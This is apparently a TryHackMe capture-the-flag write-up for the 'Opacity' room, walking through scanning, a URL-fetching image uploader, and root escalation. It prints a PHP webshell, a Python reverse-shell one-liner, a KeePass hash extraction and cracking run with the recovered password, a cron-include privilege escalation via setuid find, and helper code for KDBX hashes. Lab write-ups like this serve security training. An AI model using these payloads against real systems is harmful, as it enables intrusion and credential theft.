Opacity
The following post by anthonyjsaab is licensed under
Link to room:
Machine version: Opacity2
This writeup walks you through a room on TryHackMe created by and
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T5 -p- 10.10.148.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 17:56 EEST
Nmap scan report for 10.10.148.146
Host is up (0.12s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 253.34 seconds
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sC -sV -O -p22,80,139,445 10.10.148.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-26 18:02 EEST
Nmap scan report for 10.10.148.146
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0f:ee:29:10:d9:8e:8c:53:e6:4d:e3:67:0c:6e:be:e3 (RSA)
| 256 95:42:cd:fc:71:27:99:39:2d:00:49:ad:1b:e4:cf:0e (ECDSA)
|_ 256 ed:fe:9c:94:ca:9c:08:6f:f2:5c:a6:cf:4d:3c:8e:5b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.5 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2024-04-26T15:02:23
|_ start_date: N/A
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: -12s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.96 seconds
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.148.146
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.148.146
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/css (Status: 301) [Size: 312] [--> http://10.10.148.146/css/]
/index.php (Status: 302) [Size: 0] [--> login.php]
/server-status (Status: 403) [Size: 278]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.148.146
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.148.146
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/cloud (Status: 301) [Size: 314] [--> http://10.10.148.146/cloud/]
/css (Status: 301) [Size: 312] [--> http://10.10.148.146/css/]
/server-status (Status: 403) [Size: 278]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================
Browsing to /cloud shows an image uploader. It seems to let anonymous visitors upload an image by giving the server a URL to fetch, and then hands out a link to the stored copy. The image seems to be erased after 5 minutes. Let us try it out.
┌──(kali㉿kali)-[~/Downloads]
└─$ ls | grep *.jpg
f5054e97620f168c7b5088c85ab1d6e4.jpg
┌──(kali㉿kali)-[~/Downloads]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Because the server fetches whatever URL it is given and stores the result under /cloud/images, this is perfect for a webshell.
┌──(kali㉿kali)-[~/Downloads]
└─$ ls *.php
php_webshell.php
┌──(kali㉿kali)-[~/Downloads]
└─$ cat php_webshell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
We host the webshell on Kali with Python's http.server and submit its URL to the upload form; the target fetches it from us:
┌──(kali㉿kali)-[~/Downloads]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.148.146 - - [26/Apr/2024 21:18:21] "GET /php_webshell.php HTTP/1.1" 200 -
For a proper interactive shell, start a listener on port 5555 and run this Python reverse-shell one-liner through the webshell (10.14.78.249 is the attacker's VPN address):
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.14.78.249",5555));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
┌──(kali㉿kali)-[~/Downloads]
└─$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.14.78.249] from (UNKNOWN) [10.10.148.146] 35982
www-data@opacity:/var/www/html/cloud/images$
We got our reverse shell and a foothold on the target as www-data. Looking around, /opt holds a KeePass database worth exfiltrating:
www-data@opacity:/var/www/html/cloud/images$ cd ..
cd ..
www-data@opacity:/var/www/html/cloud$ ls
ls
folder.png images index.php load.gif storage.php style.css
www-data@opacity:/var/www/html/cloud$ cd /opt
cd /opt
www-data@opacity:/opt$ ls
ls
dataset.kdbx
www-data@opacity:/opt$ python -m http.server 80
www-data@opacity:/opt$ python3 -m http.server 8080
python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.14.78.249 - - [26/Apr/2024 18:23:39] "GET / HTTP/1.1" 200 -
10.14.78.249 - - [26/Apr/2024 18:23:39] code 404, message File not found
10.14.78.249 - - [26/Apr/2024 18:23:39] "GET /favicon.ico HTTP/1.1" 404 -
10.14.78.249 - - [26/Apr/2024 18:23:40] "GET /dataset.kdbx HTTP/1.1" 200 -
┌──(kali㉿kali)-[~/Downloads]
└─$ wget http://10.10.148.146:8080/dataset.kdbx
--2024-04-26 21:27:41-- http://10.10.148.146:8080/dataset.kdbx
Connecting to 10.10.148.146:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1566 (1.5K) [application/octet-stream]
Saving to: ‘dataset.kdbx’
dataset.kdbx 100%[==========================================>] 1.53K --.-KB/s in 0s
2024-04-26 21:27:41 (359 MB/s) - ‘dataset.kdbx’ saved [1566/1566]
┌──(kali㉿kali)-[~/Downloads]
└─$ keepass2john dataset.kdbx
dataset:$keepass$*2*100000*0*2114f635de17709ecc4a2be2c3403135ffd7c0dd09084c4abe1d983ad94d93a5*2bceccca0facfb762eb79ca66588135c72a8835e43d871977ff7d3e9db0ffa17*cae9a25c785fc7f16772bb00bac5cc82*b68e2c3be9e46e8b7fc05eb944fad8b4ec5254a40084a73127b4126408b2ff46*b0afde2bd0db881200fc1c2494baf7c28b7486f081a82e935411ab72a27736b4
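Everything in that line comes straight out of the database's plaintext outer header, including the AES-KDF round count that decides how fast the crack can go. The following is an added example for this writeup, not code from the room, from john or from hashcat: a minimal KDBX 3.x header parser that reproduces the keepass2john line and a parser for the line itself. The database header it runs on is constructed inline with fixed byte patterns as seeds (it is not a real KeePass file and its "ciphertext" is filler), and the function names are my own. It assumes the KDBX 3.x layout (1-byte field ID, 2-byte little-endian length) and rejects KDBX 4, whose Argon2 header is different and is not what hashcat mode 13400 cracks.

```python
"""KDBX 3.x outer-header parser that reproduces the $keepass$*2* line keepass2john emits.

Added example, not code from the room or from john/hashcat. The sample
database header is constructed inline (fixed byte patterns as seeds).
Assumption: KDBX 3.x layout (1-byte field ID, 2-byte LE length); KDBX 4 is rejected.
"""
import struct

KDBX_SIG1 = 0x9AA2D903          # first magic, all KDBX versions
KDBX_SIG2_V2 = 0xB54BFB67       # second magic for the KeePass 2.x container

# Outer-header field IDs used by KDBX 3.x
END_OF_HEADER = 0
CIPHER_ID = 2
COMPRESSION_FLAGS = 3
MASTER_SEED = 4
TRANSFORM_SEED = 5
TRANSFORM_ROUNDS = 6
ENCRYPTION_IV = 7
PROTECTED_STREAM_KEY = 8
STREAM_START_BYTES = 9
INNER_RANDOM_STREAM_ID = 10

AES_CIPHER_UUID = bytes.fromhex("31c1f2e6bf714350be5805216afc5aff")  # AES-256-CBC


def parse_kdbx3_header(blob: bytes) -> dict:
    """Return the outer-header fields of a KDBX 3.x blob plus 'payload_offset'."""
    if len(blob) < 12:
        raise ValueError("too short to be a KDBX file")
    sig1, sig2, minor, major = struct.unpack_from("<IIHH", blob, 0)
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2_V2):
        raise ValueError("not a KeePass 2.x (KDBX) file")
    if major != 3:
        raise ValueError(f"KDBX {major}.{minor}: only the 3.x header layout is handled")
    fields, pos = {}, 12
    while True:
        if pos + 3 > len(blob):
            raise ValueError("header truncated")
        field_id, length = struct.unpack_from("<BH", blob, pos)
        pos += 3
        data = blob[pos:pos + length]
        if len(data) != length:
            raise ValueError("header field truncated")
        pos += length                      # the end-of-header field is consumed too
        if field_id == END_OF_HEADER:
            break
        fields[field_id] = data
    fields["payload_offset"] = pos         # first byte of ciphertext
    return fields


def keepass2john_line(name: str, blob: bytes) -> str:
    """Build the name:$keepass$*2*rounds*alg*seeds... line that keepass2john prints."""
    h = parse_kdbx3_header(blob)
    if h.get(CIPHER_ID) != AES_CIPHER_UUID:
        raise ValueError("only the AES cipher (algorithm 0 in the hash line) is handled here")
    (rounds,) = struct.unpack("<Q", h[TRANSFORM_ROUNDS])
    start = h["payload_offset"]
    first_block = blob[start:start + 32]   # first 32 bytes of ciphertext, checked against stream start bytes
    if len(first_block) != 32:
        raise ValueError("no encrypted payload after the header")
    return "{}:$keepass$*2*{}*0*{}*{}*{}*{}*{}".format(
        name, rounds, h[MASTER_SEED].hex(), h[TRANSFORM_SEED].hex(),
        h[ENCRYPTION_IV].hex(), h[STREAM_START_BYTES].hex(), first_block.hex())


def parse_keepass_hash(line: str) -> dict:
    """Split a $keepass$*2* line (with or without name: prefix or :password suffix) into fields."""
    body = line[line.index("$keepass$"):].split(":")[0]
    parts = body.split("*")
    if len(parts) != 9 or parts[1] != "2":
        raise ValueError("not a KeePass 2.x hash line")
    fields = {
        "rounds": int(parts[2]), "algorithm": int(parts[3]),
        "master_seed": bytes.fromhex(parts[4]), "transform_seed": bytes.fromhex(parts[5]),
        "iv": bytes.fromhex(parts[6]), "stream_start_bytes": bytes.fromhex(parts[7]),
        "first_block": bytes.fromhex(parts[8]),
    }
    for key, size in (("master_seed", 32), ("transform_seed", 32), ("iv", 16),
                      ("stream_start_bytes", 32), ("first_block", 32)):
        if len(fields[key]) != size:
            raise ValueError(f"{key} should be {size} bytes")
    return fields


def build_sample_kdbx3(rounds: int = 100000) -> bytes:
    """Constructed KDBX 3.1 header plus 64 bytes of filler 'ciphertext' (sample data, not a real file)."""
    def field(fid: int, data: bytes) -> bytes:
        return struct.pack("<BH", fid, len(data)) + data
    blob = struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2_V2, 1, 3)    # file version 3.1
    blob += field(CIPHER_ID, AES_CIPHER_UUID)
    blob += field(COMPRESSION_FLAGS, struct.pack("<I", 1))        # gzip
    blob += field(MASTER_SEED, bytes(range(0, 32)))
    blob += field(TRANSFORM_SEED, bytes(range(32, 64)))
    blob += field(TRANSFORM_ROUNDS, struct.pack("<Q", rounds))
    blob += field(ENCRYPTION_IV, bytes(range(64, 80)))
    blob += field(PROTECTED_STREAM_KEY, bytes(32))
    blob += field(STREAM_START_BYTES, bytes(range(80, 112)))
    blob += field(INNER_RANDOM_STREAM_ID, struct.pack("<I", 2))   # Salsa20
    blob += field(END_OF_HEADER, b"\r\n\r\n")
    return blob + bytes(range(112, 176))


if __name__ == "__main__":
    line = keepass2john_line("sample", build_sample_kdbx3())
    print(line)
    print(parse_keepass_hash(line)["rounds"], "AES-KDF rounds")
```

The point to take away is that the transform-round count (100000 in dataset.kdbx) sits in the clear in the header, so an attacker knows the cracking cost before starting: at the 48964 H/s hashcat reports below on an RTX 4080 SUPER, the whole 14344385-word rockyou keyspace would take roughly 293 seconds, and a 9-digit master password falls well before that.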
Save the hash to dataset.hash (without the dataset: prefix that keepass2john prepends, or pass --username) and crack it with hashcat mode 13400 (KeePass) against rockyou.txt; this run used a Windows host with an RTX 4080 SUPER:
C:\Users\Anthony\Desktop\hashcat-6.2.6>hashcat -a 0 -m 13400 dataset.hash rockyou.txt
hashcat (v6.2.6) starting
Successfully initialized the NVIDIA main driver CUDA runtime library.
Failed to initialize NVIDIA RTC library.
* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
CUDA SDK Toolkit required for proper device support and utilization.
Falling back to OpenCL runtime.
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 3.0 CUDA 12.4.131) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: NVIDIA GeForce RTX 4080 SUPER, 16256/16375 MB (4093 MB allocatable), 80MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1470 MB
Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs
$keepass$*2*100000*0*2114f635de17709ecc4a2be2c3403135ffd7c0dd09084c4abe1d983ad94d93a5*2bceccca0facfb762eb79ca66588135c72a8835e43d871977ff7d3e9db0ffa17*cae9a25c785fc7f16772bb00bac5cc82*b68e2c3be9e46e8b7fc05eb944fad8b4ec5254a40084a73127b4126408b2ff46*b0afde2bd0db881200fc1c2494baf7c28b7486f081a82e935411ab72a27736b4:741852963
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*100000*0*2114f635de17709ecc4a2be2c34031...7736b4
Time.Started.....: Fri Apr 26 21:39:41 2024 (2 secs)
Time.Estimated...: Fri Apr 26 21:39:43 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 48964 H/s (8.45ms) @ Accel:4 Loops:512 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 81920/14344385 (0.57%)
Rejected.........: 0/81920 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:99840-100000
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> janson
Hardware.Mon.#1..: Temp: 47c Fan: 0% Util:100% Core:2790MHz Mem:11251MHz Bus:16
Started: Fri Apr 26 21:39:38 2024
Stopped: Fri Apr 26 21:39:44 2024
The master password is 741852963. Open dataset.kdbx with it to read the stored credentials, which give SSH access as sysadmin:
┌──(kali㉿kali)-[~/Downloads]
└─$ ssh sysadmin@10.10.148.146
sysadmin@10.10.148.146's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-139-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 26 Apr 2024 06:50:43 PM UTC
System load: 0.05 Processes: 129
Usage of /: 57.1% of 8.87GB Users logged in: 0
Memory usage: 28% IPv4 address for eth0: 10.10.148.146
Swap usage: 0%
* Introducing Expanded Security Maintenance for Applications.
Receive updates to over 25,000 software packages with your
Ubuntu Pro subscription. Free for personal use.
https://ubuntu.com/pro
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Feb 22 08:13:43 2023 from 10.0.2.15
sysadmin@opacity:~$ ls
local.txt scripts
sysadmin@opacity:~$ ls -la
total 44
drwxr-xr-x 6 sysadmin sysadmin 4096 Feb 22 2023 .
drwxr-xr-x 3 root root 4096 Jul 26 2022 ..
-rw------- 1 sysadmin sysadmin 22 Feb 22 2023 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Feb 25 2020 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Jul 26 2022 .cache
drwx------ 3 sysadmin sysadmin 4096 Jul 28 2022 .gnupg
-rw------- 1 sysadmin sysadmin 33 Jul 26 2022 local.txt
-rw-r--r-- 1 sysadmin sysadmin 807 Feb 25 2020 .profile
drwxr-xr-x 3 root root 4096 Jul 8 2022 scripts
drwx------ 2 sysadmin sysadmin 4096 Jul 26 2022 .ssh
-rw-r--r-- 1 sysadmin sysadmin 0 Jul 28 2022 .sudo_as_admin_successful
sysadmin@opacity:~$ cd scripts/
sysadmin@opacity:~/scripts$ ls -la
total 16
drwxr-xr-x 3 root root 4096 Jul 8 2022 .
drwxr-xr-x 6 sysadmin sysadmin 4096 Feb 22 2023 ..
drwxr-xr-x 2 sysadmin root 4096 Jul 26 2022 lib
-rw-r----- 1 root sysadmin 519 Jul 8 2022 script.php
sysadmin@opacity:~/scripts$ head script.php
<?php
//Backup of scripts sysadmin folder
require_once('lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;
//Files scheduled removal
$dir = "/var/www/html/cloud/images";
if(file_exists($dir)){
sysadmin@opacity:~/scripts$ head lib/backup.inc.php
<?php
ini_set('max_execution_time', 600);
ini_set('memory_limit', '1024M');
function zipData($source, $destination) {
if (extension_loaded('zip')) {
if (file_exists($source)) {
The scripts directory is owned by root and script.php is root-owned and readable only by root and sysadmin, but the lib directory inside it belongs to sysadmin, and script.php does require_once('lib/backup.inc.php'). Since script.php performs the backup and the scheduled cleanup of the upload directory, it is run by root (the escalation below depends on that), so whatever PHP we place in lib/backup.inc.php runs as root on its next scheduled run. Copy backup.inc.php out, prepend a chmod call that turns /usr/bin/find setuid root, and move the modified copy back over lib/backup.inc.php:
sysadmin@opacity:~/scripts$ cp lib/backup.inc.php ~
sysadmin@opacity:~/scripts$ which find
/usr/bin/find
sysadmin@opacity:~/scripts$ nano ~/backup.inc.php
sysadmin@opacity:~/scripts$ head ~/backup.inc.php
<?php
chmod ("/usr/bin/find", 7777);
ini_set('max_execution_time', 600);
ini_set('memory_limit', '1024M');
function zipData($source, $destination) {
if (extension_loaded('zip')) {
if (file_exists($source)) {
sysadmin@opacity:~/scripts$ mv ~/backup.inc.php lib/backup.inc.php
mv: replace 'lib/backup.inc.php', overriding mode 0644 (rw-r--r--)? yes
After the script's next run, find carries the setuid bit:
sysadmin@opacity:~/scripts$ ls -la /usr/bin/find
---sr-S--t 1 root root 320160 Feb 18 2020 /usr/bin/find
Note the odd mode: chmod was called with 7777 as a decimal literal rather than the octal 04755 that was meant (which would have shown as rwsr-xr-x). Decimal 7777 is octal 17141, and the kernel keeps only the low twelve bits, giving mode 7141: setuid, setgid and sticky are set, the owner has only execute, the group only read, and others only execute. That is still enough, because the file is setuid root and executable by sysadmin. Since -p tells sh not to drop the effective UID, find's -exec gives a root shell:
sysadmin@opacity:~/scripts$ find . -exec /bin/sh -p \; -quit
# whoami
root
# cd /root
# ls
proof.txt snap
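To make the permission mix-up above concrete without touching a real binary, here is an added example for this writeup (not code from the room): it renders mode bits the way ls -l does and shows why PHP's chmod("/usr/bin/find", 7777), a decimal literal, produced ---sr-S--t yet still yielded a usable setuid root find, while the intended octal 04755 would have given rwsr-xr-x. The function names are my own; the kernel behaviour assumed is that chmod(2) keeps only the low twelve bits of the mode it is handed.

```python
"""Why chmod("/usr/bin/find", 7777) in PHP produced ---sr-S--t rather than rwsr-xr-x.

Added example, not part of the original writeup. PHP's chmod() takes an
integer: 7777 without a leading 0 is decimal 7777 (octal 17141), and the
kernel keeps only the low twelve permission bits (assumption: chmod(2)
masks with 07777, as Linux does).
"""
import stat

PERM_MASK = 0o7777   # suid, sgid, sticky plus rwx for user/group/other


def effective_mode(php_literal: int) -> int:
    """Mode bits the kernel keeps when PHP (or C) passes php_literal to chmod(2)."""
    return php_literal & PERM_MASK


def ls_mode_string(mode: int) -> str:
    """Render the permission bits of a regular file exactly as `ls -l` prints them."""
    mode &= PERM_MASK
    out = ["-"]                        # leading '-' is the regular-file type
    triples = ((6, stat.S_ISUID, "s"), (3, stat.S_ISGID, "s"), (0, stat.S_ISVTX, "t"))
    for shift, special, letter in triples:
        bits = (mode >> shift) & 0o7
        out.append("r" if bits & 4 else "-")
        out.append("w" if bits & 2 else "-")
        executable = bool(bits & 1)
        if mode & special:
            # lower case: special bit plus execute; upper case: special bit without execute
            out.append(letter if executable else letter.upper())
        else:
            out.append("x" if executable else "-")
    return "".join(out)


def setuid_usable_by_others(mode: int) -> bool:
    """True when a root-owned file with this mode is setuid and executable by 'other'.

    Group permissions are ignored on purpose: the caller here (sysadmin) is not in group root.
    """
    mode &= PERM_MASK
    return bool(mode & stat.S_ISUID) and bool(mode & stat.S_IXOTH)


if __name__ == "__main__":
    for label, literal in (("decimal 7777 (what the script did)", 7777),
                           ("octal 04755 (what was meant)", 0o4755)):
        m = effective_mode(literal)
        print(f"{label}: {oct(m)} -> {ls_mode_string(m)}, "
              f"setuid shell for sysadmin: {setuid_usable_by_others(m)}")
```

Had the literal come out with the other-execute bit clear (for example 7776 decimal, octal 7140), the setuid bit would have been set but find would not have been executable by sysadmin at all, and the attempt would have failed silently until the next scheduled run; writing the mode as 04755 avoids the guesswork.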
This guide helped me greatly: